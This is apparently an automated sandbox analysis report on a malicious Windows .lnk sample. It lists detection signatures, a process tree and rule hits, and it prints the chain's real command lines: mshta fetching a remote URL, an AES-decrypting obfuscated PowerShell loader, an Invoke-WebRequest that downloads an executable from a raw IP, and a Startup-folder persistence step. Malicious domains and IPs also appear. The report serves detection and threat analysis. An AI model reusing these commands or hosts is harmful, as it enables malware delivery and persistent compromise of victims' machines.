Windows Analysis Report
R8CAg00Db8.lnk

Overview

General Information

Sample name: R8CAg00Db8.lnk
renamed because original name is a hash value
Original sample name: cdbfcc4d882ca6b35d7429cebc384245.lnk
Analysis ID: 1577880
MD5: cdbfcc4d882ca6b35d7429cebc384245
SHA1: ef60efe666dc9eee33d4f847dde57aba34e78bd6
SHA256: 245641a41fbc20b6ff8e1b199ac9af9a103d6e9215e352f3f9e3aedec889b9e4
Tags: lnk, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 2108 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1 MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3620 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 4412 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 1260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('[hex-encoded payload omitted]');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Substring(0,3) $jftLKJake.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 4904 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7528 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • PefjSkkhb.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" MD5: 567DE19C0E7E3A1FC845E51AC1C1D5D8)
            • powershell.exe (PID: 8176 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4484 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 7936 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 7712 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 5800 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 1260
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xffafb:$b1: ::WriteAllBytes(
  • 0x100298:$b1: ::WriteAllBytes(
  • 0x75e4:$b3: ::UTF8.GetString(
  • 0x82ec:$b3: ::UTF8.GetString(
  • 0x8eba:$b3: ::UTF8.GetString(
  • 0x54b75:$b3: ::UTF8.GetString(
  • 0x54cc2:$b3: ::UTF8.GetString(
  • 0x6f51c:$b3: ::UTF8.GetString(
  • 0xe483e:$b3: ::UTF8.GetString(
  • 0xe53eb:$b3: ::UTF8.GetString(
  • 0x13b400:$b3: ::UTF8.GetString(
  • 0x13b448:$b3: ::UTF8.GetString(
  • 0x14335b:$b3: ::UTF8.GetString(
  • 0x143f25:$b3: ::UTF8.GetString(
  • 0x144cf4:$b3: ::UTF8.GetString(
  • 0x145a7d:$b3: ::UTF8.GetString(
  • 0x145bd0:$b3: ::UTF8.GetString(
  • 0x1b1d5e:$b3: ::UTF8.GetString(
  • 0x1b290b:$b3: ::UTF8.GetString(
  • 0x1b38e7:$b3: ::UTF8.GetString(
  • 0x1bc595:$b3: ::UTF8.GetString(

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4484, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7936, ProcessName: Guard.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 4484, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7936, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 7712, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3620, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1, ProcessId: 4412, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 4484, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('[hex-encoded payload omitted]');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Sub
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4136, ProcessName: wscript.exe
Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Guard.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean('[hex-encoded payload omitted]');$oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($ernnEW, 0,$ernnEW.Length)); & $jftLKJake.Sub
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4136, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 5800, ProcessName: SwiftWrite.pif
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1260, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 8120, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 8176, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4136, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 2108, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep1, ProcessId: 3620, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6632, ProcessName: svchost.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7712, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp: 2024-12-18T21:00:18.291783+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.4, Source Port: 49733, Destination IP: 147.45.49.155, Destination Port: 80, Protocol: TCP

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]; ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe; ReversingLabs: Detection: 31%
Source: R8CAg00Db8.lnk; ReversingLabs: Detection: 21%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.3% probability
Source: unknown; HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe
Source: Binary string: dvdplay.pdb source: mshta.exe
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00007FF79F8EC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EBC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00007FF79F8F72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F71F4 FindFirstFileW,FindClose,10_2_00007FF79F8F71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2F50 FindFirstFileExW,10_2_00007FF79F8B2F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00007FF79F8FA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F6428 FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF79F8F6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA350
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F14005
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_00F1494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_00F1CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD14 FindFirstFileW,FindClose,20_2_00F1CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F735
